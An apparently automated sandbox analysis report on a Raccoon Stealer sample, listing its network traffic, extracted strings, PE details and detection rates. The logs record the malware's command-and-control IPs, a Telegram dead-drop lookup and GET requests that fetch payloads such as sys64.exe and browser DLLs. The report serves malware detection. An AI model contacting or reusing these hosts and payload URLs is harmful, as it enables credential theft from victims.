                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 25 Nov 2021 17:24:13 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Sun, 14 Nov 2021 14:06:12 GMTETag: "619117d4-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 16 7c fd ce 82 15 6b fd 05 df bc eb d6 db ae 9a 3c 79 52 a1 5e c6 45 07 6f 18 6e 78 73 d1 63 c6 9f ef d1 9f 3d 56 0f bf ed cf 2c fe e9 46 f8 ed bb fb cc 63 75 f4 bc e4 a7 1b e8 77 c1 4f fd f4 5b f2 d3 75 f0 7b cf d3 3c df 77 ff b8 f8 a7 37 50 19 8b 1f 7b 91 9e 4b 7e ea a6 df 45 f4 dd 77 ff f8 d2 63 fc f7 1a 7a 5e f7 f5 5b 5a b0 be 7f d7 36 9f 47 10 56 9b 32 84 e7 2b ba 6e 34 de 0d 08 97 cc c9 31 4d c9 11 2e 84 86 97 f0 77 7b 66 c3 bd 03 6e 4a 4c f8 e8 a0 7b b3 20 64 0a f4 9c fc 15 da 4d 84 e4 2b b6 98 20 b9 82 7f e4 10 84 d4 2f ff 29 b8 ce 24 58 21 b5 08 b2 f4 e3 cb 9b 4c c2 0e 4b 1a 60 ab 4d c2 91 8b e0 77 b3 49 f8 ef 4c 41 38 72 ad 49 58 ff 7f e8 a3 a2 72 d3 c4 be 04 38 37 98 ff 7d fe ab c2 b7 ed 08 c3 ef e9 3c bd 5d 17 72 b8 d3 ff 15 00 54 57 6d bd f5 e6 f0 cd 82 b0 62 36 2f 13 5f 0a 17 9b d2 b3 61 bd 15 57 f1 6c 42 02 db e0 33 11 6e 84 e5 5f ca 17 bb 6a eb b6 ad b7 08 02 6f eb 4d 7a 9d 15 5f 51 de d6 db ee b8 eb 16 81 da 8e 38 10 ac f0 bb e2 4b f9 2a 85 ff ff bf ff a7 7f f5 ea 90 bc ac c8 67 72 08 e1 4c b9 cd 2a 48 2e b5 d6 76 b6 fb 8b 84 36 5b 2a 92 bf e9 34 49 97 a8 dd 7b de 31 67 09 c2 3c 1c 02 3e 4d ca d3 24 47 9d 26 59 d9 8b d0 f7 f2 0b ce c6 1e 2d f7 a1 12 93 a3 4f 98 01 39 5c b1 c6 1e 2c 74 c8 e1 57 1b 6d ae 58 20 a8 b6 59 d5 33 ea 2a 87 e2 19 53 3c 23 7d 1e 22 85 3e cf 30 52 42 67 2c 9c 1d b2 6c 68 2e 73 8b e1 6f d8 0f b8 c5 e6 72 cf 70 38 13 ae 09 29 bf cf 33 82 1d 4b 0f 76 fb 01 93 eb 64 73 d9 8d 6e 33 14 2b 5d 07 8f f6 03 2b dc e3 ae c3 ed 6b 72 4d 75 01 5f 90 59 5c 82 a0 0e cb 2f 38 54 cf 18 96 0b af 06 26 0b 42 43 83 22 8d 75 8e da 3b be 0f 65 a9 6b 20 75 24 1e 81 cf 15 8f cd 7e 60 bd 7b 1c 21 ab 4d c8 09 f3 ae 5c 57 ac 59 a9 33 37 2b 6e 51 f5 5a 95 2a ab ea b1 c5 33 5c 47 15 bf 35 64 be a1 f8 90 5a 9f 68 56 4c cd ea 5a 1b 7c 6b 89 35 17 f7 ab 58 46 ac 59 1e cc 6c 56 56 57 9a d5 43 98 d8 7c bd fd 80 80 cf 62 fb aa 5c 93 5a 0f 95 87 6d 81 20 f3 03 30 f0 d4 d0 50 fe 46 38 7b 5d 90 55 11 70 da da 52 57 2c 6e 91 fb b5 4d 4d 1b d5 7f e8 c8 73 aa 1e c2 5f 40 b5 aa 3e 51 dd 08 20 8e a8
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.162
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.163.47.176
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.163.47.176
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.163.47.176
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.163.47.176
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.38.54.238
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.38.54.238
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.38.54.238
                      Source: unknownTCP traffic detected without corresponding DNS query: 193.38.54.238
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 74.119.192.122
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.240
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: unknownTCP traffic detected without corresponding DNS query: 91.219.236.69
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.480552917.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: http://188.127.251.217/
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.480552917.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: http://188.127.251.217/sys64.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.480552917.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: http://188.127.251.217/sys64.exe7e1bbc7bd
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.316126752.0000000000553000.00000004.00000001.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.316201744.000000000055A000.00000004.00000001.sdmpString found in binary or memory: http://193119.192.122/
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.316146963.000000000056C000.00000004.00000001.sdmpString found in binary or memory: http://74.119.192.122/
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.478545220.0000000000562000.00000004.00000020.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427958773.000000004BC86000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427854051.0000000002E8E000.00000004.00000001.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.428000904.000000004BC86000.00000004.00000010.sdmpString found in binary or memory: http://91.219.236.69/
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.478545220.0000000000562000.00000004.00000020.sdmpString found in binary or memory: http://91.219.236.69//l/f/i6j2Un0B3dP17SpzFNyq/c88f6d712fdcff784a2f2a2ae8ea36494792f04b
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.478545220.0000000000562000.00000004.00000020.sdmpString found in binary or memory: http://91.219.236.69//l/f/i6j2Un0B3dP17SpzFNyq/c88f6d712fdcff784a2f2a2ae8ea36494792f04b04
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.427958773.000000004BC86000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.428000904.000000004BC86000.00000004.00000010.sdmpString found in binary or memory: http://91.219.236.69:80/_netfx4-system.web.routing_b03f5f7f11d50a3a_4.0.15671.0_none_a9bac3c753caa48
                      Source: ldap60.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: ldap60.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                      Source: nssckbi.dll.0.drString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.478545220.0000000000562000.00000004.00000020.sdmp, nssckbi.dll.0.drString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                      Source: ldap60.dll.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                      Source: ldap60.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                      Source: ldap60.dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                      Source: ldap60.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: ldap60.dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                      Source: nssckbi.dll.0.drString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://ocsp.accv.es0
                      Source: ldap60.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: ldap60.dll.0.drString found in binary or memory: http://ocsp.digicert.com0N
                      Source: ldap60.dll.0.drString found in binary or memory: http://ocsp.thawte.com0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://policy.camerfirma.com0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://repository.swisssign.com/0
                      Source: ldap60.dll.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                      Source: ldap60.dll.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                      Source: ldap60.dll.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                      Source: Amcache.hve.0.drString found in binary or memory: http://upx.sf.net
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.accv.es00
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.certicamara.com/dpc/0Z
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.chambersign.org1
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.firmaprofesional.com/cps0
                      Source: mozglue.dll.0.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                      Source: ldap60.dll.0.drString found in binary or memory: http://www.mozilla.com0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.quovadis.bm0
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.quovadisglobal.com/cps0
                      Source: sqlite3.dll.0.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                      Source: nssckbi.dll.0.drString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
                      Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: nssckbi.dll.0.drString found in binary or memory: https://ocsp.quovadisoffshore.com0
                      Source: nssckbi.dll.0.drString found in binary or memory: https://repository.luxtrust.lu0
                      Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                      Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: nssckbi.dll.0.drString found in binary or memory: https://www.catcert.net/verarrel
                      Source: nssckbi.dll.0.drString found in binary or memory: https://www.catcert.net/verarrel05
                      Source: ldap60.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: RYwTiizs2t.0.dr, 1xVPfvJcrg.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 91.219.236.69
                      Source: unknownDNS traffic detected: queries for: t.me
                      Source: global trafficHTTP traffic detected: GET /masterdanteloma HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: t.me
                      Source: global trafficHTTP traffic detected: GET //l/f/i6j2Un0B3dP17SpzFNyq/762b827e1bbc7bd715bf97e0fb01fbddd5bf5ab2 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.69
                      Source: global trafficHTTP traffic detected: GET //l/f/i6j2Un0B3dP17SpzFNyq/c88f6d712fdcff784a2f2a2ae8ea36494792f04b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.69
                      Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49766 version: TLS 1.2

                      E-Banking Fraud:

                      barindex
                      Yara detected Raccoon StealerShow sources
                      Source: Yara matchFile source: 0.3.Tk6dsSEyOC.exe.2340000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.Tk6dsSEyOC.exe.2340000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Tk6dsSEyOC.exe.22b0e50.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.478315203.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.480197054.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.251005006.0000000002340000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Tk6dsSEyOC.exe PID: 7164, type: MEMORYSTR
                      Source: Tk6dsSEyOC.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0041C2170_2_0041C217
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_004362A10_2_004362A1
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0041E6DA0_2_0041E6DA
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0040E7270_2_0040E727
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_00410AD20_2_00410AD2
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_00434CB50_2_00434CB5
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0041AD320_2_0041AD32
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0043CD970_2_0043CD97
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0041D3640_2_0041D364
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0040D5600_2_0040D560
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0040F78B0_2_0040F78B
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_004158160_2_00415816
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_00427AAA0_2_00427AAA
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_00429B400_2_00429B40
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0040DC7B0_2_0040DC7B
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0041DD0B0_2_0041DD0B
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_00435E430_2_00435E43
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0044C1E60_2_0044C1E6
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0043C20A0_2_0043C20A
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0042035B0_2_0042035B
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_004103F70_2_004103F7
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0044C4430_2_0044C443
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_004185E70_2_004185E7
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_0042862C0_2_0042862C
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: String function: 00466770 appears 89 times
                      Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-interlocked-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-stdio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-util-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-processthreads-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-private-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-process-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-synch-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-timezone-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-file-l2-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-handle-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-synch-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-profile-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-localization-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-math-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-time-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-locale-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-processthreads-l1-1-1.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-utility-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-multibyte-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-conio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-convert-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-runtime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-file-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-memory-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-core-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: api-ms-win-crt-environment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.427951428.000000004BC7E000.00000004.00000010.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.373328236.0000000002EE2000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.483474987.000000006FD92000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamemozglue.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.373618716.000000004BC7F000.00000004.00000010.sdmpBinary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.376545109.0000000002EDD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameIA2Marshal.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.427974547.0000000002EE6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.481321705.000000004BC7E000.00000004.00000010.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.372509130.0000000002EE1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAccessibleMarshal.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.372483857.000000004BC51000.00000004.00000010.sdmpBinary or memory string: OriginalFilenameAccessibleMarshal.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.373284353.000000004BC7E000.00000004.00000010.sdmpBinary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.427918812.0000000002EDD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.373416548.000000004BC7E000.00000004.00000010.sdmpBinary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.483336296.000000006EEEB000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamenss3.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmpBinary or memory string: OriginalFilenamefreebl3.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.376567749.000000004BC7F000.00000004.00000010.sdmpBinary or memory string: OriginalFilenameIA2Marshal.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.378183747.0000000002EDD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameldap60.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.378196371.000000004BC7F000.00000004.00000010.sdmpBinary or memory string: OriginalFilenameldap60.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmpBinary or memory string: OriginalFilenamefreebl3.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.373424728.0000000002EE2000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.373403037.000000004BC7E000.00000004.00000010.sdmpBinary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exe, 00000000.00000003.373313194.000000004BC7E000.00000004.00000010.sdmpBinary or memory string: OriginalFilenamebreakpadinjector.dll8 vs Tk6dsSEyOC.exe
                      Source: Tk6dsSEyOC.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: Tk6dsSEyOC.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: sqlite3.dll.0.drStatic PE information: Number of sections : 18 > 10
                      Source: Tk6dsSEyOC.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: Tk6dsSEyOC.exeVirustotal: Detection: 49%
                      Source: Tk6dsSEyOC.exeReversingLabs: Detection: 54%
